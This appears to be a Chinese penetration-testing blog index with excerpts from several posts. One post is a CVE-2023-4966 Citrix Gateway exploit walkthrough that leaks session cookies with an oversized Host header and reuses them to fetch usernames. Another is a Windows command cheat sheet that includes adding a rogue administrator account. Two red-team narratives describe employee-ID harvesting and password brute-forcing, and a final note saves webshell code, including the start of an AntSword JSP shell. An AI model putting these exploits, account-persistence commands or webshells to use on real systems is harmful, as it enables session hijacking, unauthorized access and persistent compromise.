前言Citrix Gateway是一套安全的远程接入解决方案,能够提供具有身份识别和访问管理功能(IdAM) 功能的安全远程访问解决方案。在国内的话,多数为云桌面。
本文主要讲下漏洞验证以及信息的cookie利用遇到的问题,且发现这个漏洞蛮需要运气的。
CVE-2023-4966利用方式1、获取到到目标url数据包,需要构造请求,修改host,发送请求可以看到返回cookie信息
123GET /oauth/idp/.well-known/openid-configuration HTTP/1.1Host: a* 24576Connection: close
2、关于这个host修改的长度,可以直接使用python运行代码print(“a” * 24576)获取一个,复制黏贴到host上。
3、之后可以利用这个cookie继续构造数据包获取用户名信息。
1234GET /logon/LogonPoint/Authentication/GetUserName HTTP/1.1Host: 127.0.0.1Cookie: NSC_AAAC= 6894c1bf7a53dcda00a9c4 ...
常用到服务器、工具等命令记录一些渗透测试中常用到的命令,工作更换设备的时候方便复制。
Windows常用1、新建用户及加入管理员用户组
12net user adminstrator nod@32! /addnet localgroup administrator adminstrator /add
2、修改用户密码
1net user administrator nod@32!
3、删除用户
1net user adminstrator /delete
4、查看所有用户
1net user
5、查看当前在线用户
1query user
6、查看当前主机的主机名/IP/DNS等信息
1ipconfig /all
7、查看路由表信息
1route print
8、查看端口开放情况
1netstat -ano
9、查看arp解析情况
1arp -a
10、查看进程及对应服务名
1tasklist /svc
11、 查看管理员组成员
1net localgroup administrators
12、查看系统信息含补丁信息
1systeminfo
...
渗透测试
未读前言一次企业开放式红蓝演练,从外网探索到拿下内网域控的过程,整理了一些过程。
正文1、开始根据提供的公司名称,到处收集了一些域名整合到一个表里面,在筛选查找登录、管理、vpn等特殊的资产时,找到一个更特殊些的存在,SRC平台。就感觉比较难搞了,估计到处都被白帽子光顾过了。
2、找到一个vpn资产,但是访问服务出错。后面在测其他资产的时候发现有waf拦截,探测fastjson、SQL注入啥的直接就拦截了。
3、继续收集的时候,使用公司名称在微信搜索小程序,找到访客预约小程序,对小程序抓包获取到域名,发现小程序管理后台。使用邮箱登录且存在验证码。
4、根据这个访客管理后台登录页面的html特征,在fofa上搜索了一下,发现有不少相关的资产,找到几个应该更老的版本,可以用前台用户名密码登录,有的没有验证码。
5、想着看能不能在这几个老版本找到些未授权的接口,尤其是上传接口,就花了点时间测了一下:
试了几个系统在其中一个弱口令密码进去了,发现了SQL注入、垂直越权,但都是在登录后才能利用。垂直越权访问应该是用户管理接口,返回了创建用户的信息,明文密码也被带出来了,发现创建的用户都是统 ...
前言前段时间,搞了个红蓝渗透测试,大概整理记录一下那次渗透测试。
正文1,提供的只有一个公司名称,搞到域名后缀直接鹰图语法检索,直接导出结果,看看有没有vpn、登录、管理等特殊的资产筛选出来。
2,访问很多域名发现登录都是有个统一登录认证页面的,测试登录数据包发现工号密码都被加密到一个参数info里面去了。
3,因为没有提供工号给我,只能自己找了。打开抖音,搜索【****离职了】,顺利得到工号规则。
4,用得到的工号规则,生成一批工号,因为登陆的请求数据包是加密的,不太好用burpsuite爆破,就直接用python Selenium 写了个自动登录爆破的脚本,用生成的工号去撞同一个密码,虽然效率低,好在得到了十多个弱口令工号。
5,登录后以为能找到个上传口啥的getshell,或者命令执行地方,但是都没有,连SQL注入都没搞到,文件上传限制的死死的!只能上传jpg、xlsx。
6,因为近两年疫情办公,vpn、云主机办公比较常见,尝试用这些账号去登录vpn什么的。在导出的web资产里面找到查找vpn相关资产,顺利找到4条vpn资产。https:// .vp ...
快捷笔记
未读一些常用的webshell,记录避免有时候找不着。
JSPjsp一句话打印输出验证1<%out.println("i am sircong");%>
<%out.println(“i am sircong”);%>
<%out.println("i am sircong");%>
jsp蚁剑马,密码:passwd123456789101112131415161718192021222324252627$<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { ...
